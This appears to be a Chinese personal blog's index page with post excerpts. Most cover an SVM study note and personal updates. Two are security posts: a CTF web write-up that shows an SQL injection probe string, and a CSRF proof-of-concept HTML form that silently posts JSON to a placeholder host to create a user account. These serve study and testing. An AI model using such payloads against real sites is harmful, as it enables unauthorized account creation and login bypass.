支持向量机SVM算法的学习记录

作者: 浏览次数: 2577 时间: 2018-01-05 评论: 暂无评论

写在前面

本文是对于机器学习中SVM算法的一次学习记录,主要介绍SVM的原理和简单应用。通过自己实际操作去理解SVM。

一. 绪论

1.1 什么是机器学习

机器学习并没有准确的权威定义,但作为机器学习领域的先驱Arthur Samuel将机器学习非正式定义为:“在不直接针对问题进行编程的情况下,赋予计算机学习能力的一个研究领域。”

因此,我们可以简单的理解为,机器学习这门学科所关注的问题是计算机程序如何随着经验的积累自动提高性能。

1.2 分类算法

分类算法是数据挖掘同时也是机器学习的一个重要技术之一,其应用遍及社会各个领域。分类任务就是通过学习得到一个目标函数(通常也称作分类模型,即分类器),把每个属性集映射到一个预先定义的类标号。分类和回归都可以用于预测。和回归方法不同的是,分类的类标号是离散属性,而预测建模的回归的目标属性是连续的。

阅读全文»

致谢自己的二零一七

作者: 浏览次数: 1526 时间: 2018-01-01 评论: 暂无评论

IMG_5520.JPG

真的是转眼间2017就彻底告别了,以后不会再有2017,不会再有这一年的自己。说起来2017对于自己来说真的是精彩的一年。

阅读全文»

实验吧WEB部分题解

作者: 浏览次数: 2164 时间: 2017-12-15 评论: 2条评论

写在前面

之前做的,整理笔记发出来记录一下

一、登陆一下好吗??

根据提示:
1.png

说明是一个注入题目,由于已经说了过滤了一切,所以需要看看到底过滤了什么。
01.png

提交:

username=' and or union select " < ( ) >-- #aa&password=

返回:

username:' and " < ( ) > aa

说明过滤了 or union select -- #
重新来审视这个题目,页面是一个登陆的页面,提示注入,出题者的意图其实就是让我们使用万能密码的方式进行登陆,登陆成功后,就是成功注入。但是经过上面的尝试可以知道,万能密码所需要的关键字:or union select已经被过滤了。这就需要根据实际情况进行测试了,我们可以猜测系统登陆的代码如下:




阅读全文»

博客换血

作者: 浏览次数: 1494 时间: 2017-12-07 评论: 暂无评论

原来博客想搞一个HTTPS,结果各种调试不成功,把原来的博客搞的乱七八糟,于是就重新安装了一个,文章也就重新发了一遍。
这算不算是作呢~

CSRF漏洞中以form形式用POST方法提交json数据的POC

作者: 浏览次数: 1704 时间: 2017-12-07 评论: 暂无评论

0x01 写在前面

今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,

参考了一下,最后成功构造poc。

0x02 POC

form提交post数据很简单,如下:

 <html>  
 <head>
    <title>This i a CSRF test!</title>
 </head>
 <form action="http://xxx.com/db/adds" method="post" enctype="text/plain" >  
<input name='{"attributes":{"name":"test3@test.com","userName":"test1","password":"e10adc3949ba59abbe56e057f20f883e","role":"user","status":"enabled", "phone":""}}'type='hidden'>  
 <input type=submit>  
 </form>  
 </html>

但是这种方式存在缺陷,如下图:
01.png


阅读全文»